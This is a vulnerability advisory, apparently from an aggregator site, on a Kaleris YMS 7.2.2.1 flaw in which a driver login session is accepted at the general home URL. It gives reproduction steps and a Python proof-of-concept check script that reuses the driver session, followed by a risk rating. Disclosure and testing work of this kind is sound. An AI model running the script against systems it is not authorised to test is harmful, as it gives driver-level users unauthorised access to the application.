Kaleris YMS Authentication Bypass Vulnerability in Login Mechanism

Vulnerability

An authentication bypass vulnerability has been identified in Kaleris YMS version 7.2.2.1. It allows an attacker who holds only Driver User Role credentials to bypass login verification for the general application and gain unauthorized access to its resources. YMS exposes separate login URLs, the YMS Truck Display URL used by drivers and the general home URL, each of which is meant to require its own credentials. The login mechanism does not enforce that separation: a session established through the driver login is also accepted for the general home URL. A driver can therefore reach functionality associated with the other URL without ever authenticating to it.

Impact

Exploitation of this vulnerability lets an attacker holding only Driver User Role credentials gain unauthorized access to application resources and functionality behind the general home URL, beyond what the driver login is intended to grant.

Reproduction

To reproduce this vulnerability, log in at the YMS Truck Display URL with driver credentials. Once logged in, open a new tab in the same browser session and request the general home URL. The dashboard loads without any prompt for the separate credentials that URL is meant to require, demonstrating the authentication bypass. As a control, the same request from a fresh browser session with no driver login should be sent to the login page; if it is not, the home URL is simply unauthenticated rather than accepting the driver session.
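The reproduction steps above as a scripted check, added here as an example; it is not code from the advisory or from Kaleris. The driver login path, the form field names, and the dashboard marker string are assumptions and must be adjusted to the deployment under test. It also performs a control step the advisory only implies: a fresh, unauthenticated request to the home URL is expected to be refused, so that a "bypass" result is not just the home URL being public.

```python
"""Scripted version of the Kaleris YMS driver-login session reuse check.
Added example, not vendor code; the paths, form fields and dashboard marker
below are assumptions to adjust for the target deployment."""
import http.cookiejar
import sys
import urllib.error
import urllib.parse
import urllib.request

# Assumed endpoint paths and form field names (not stated in the advisory).
DRIVER_LOGIN_PATH = "/truckdisplay/login"
HOME_PATH = "/"
LOGIN_FIELDS = ("username", "password")
# Assumed substring that appears only on the authenticated dashboard.
DASHBOARD_MARKER = "dashboard"


class NoRedirect(urllib.request.HTTPRedirectHandler):
    """Stop urllib from following 3xx responses so the redirect itself is observed."""

    def redirect_request(self, req, fp, code, msg, headers, newurl):
        return None


def classify(status, location, body, marker=DASHBOARD_MARKER):
    """Interpret a response to the general home URL.

    "enforced": refused (401/403) or redirected to a login page.
    "bypass":   200 with the dashboard marker in the body.
    "unknown":  anything else, to be inspected manually.
    """
    if status in (401, 403):
        return "enforced"
    if status in (301, 302, 303, 307, 308):
        return "enforced" if location and "login" in location.lower() else "unknown"
    if status == 200 and marker.lower() in body.lower():
        return "bypass"
    return "unknown"


def fetch(opener, url, data=None):
    """GET (or POST when data is given) without following redirects.
    Returns (status, Location header or None, body text)."""
    try:
        with opener.open(url, data=data, timeout=15) as resp:
            return resp.status, resp.headers.get("Location"), resp.read().decode(errors="replace")
    except urllib.error.HTTPError as err:
        # 3xx (because of NoRedirect) and 4xx/5xx responses land here; still useful.
        return err.code, err.headers.get("Location"), err.read().decode(errors="replace")


def check_session_reuse(base_url, username, password):
    """Log in through the driver URL, then request the general home URL with
    the same cookie jar (the advisory's "new tab in the same browser session")."""
    jar = http.cookiejar.CookieJar()
    opener = urllib.request.build_opener(NoRedirect(), urllib.request.HTTPCookieProcessor(jar))
    root = base_url.rstrip("/")
    home = root + HOME_PATH

    # Control: with no session at all, the home URL must not serve the dashboard.
    control = classify(*fetch(opener, home))

    # Driver login through the Truck Display endpoint (assumed path and fields).
    form = urllib.parse.urlencode(dict(zip(LOGIN_FIELDS, (username, password)))).encode()
    fetch(opener, root + DRIVER_LOGIN_PATH, data=form)

    # Same cookies, different login context.
    after = classify(*fetch(opener, home))
    return {
        "unauthenticated": control,
        "driver_session": after,
        "vulnerable": control == "enforced" and after == "bypass",
    }


if __name__ == "__main__":
    if len(sys.argv) != 4:
        sys.exit("usage: yms_session_check.py BASE_URL DRIVER_USER DRIVER_PASSWORD")
    for key, value in check_session_reuse(*sys.argv[1:]).items():
        print(f"{key}: {value}")
```

A "vulnerable: True" result means the home URL refused an anonymous request but served the dashboard to the driver session; "unknown" in either field means the assumed marker or login redirect did not match and the raw responses should be inspected by hand.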

Added: Apr 6, 2026, 3:29 PM
Updated: Apr 6, 2026, 3:29 PM

Vulnerability Rating

Custom Algorithm
spread: 0.0
impact: 1.3
exploitability: 6.6
remediation: 0.0
relevance: 5.4
threat: 6.4
urgency: 2.9
incentive: 0.0

Our algorithm analyzes dozens of metrics to generate these 8 key vulnerability categories, which are then combined to calculate the overall risk score.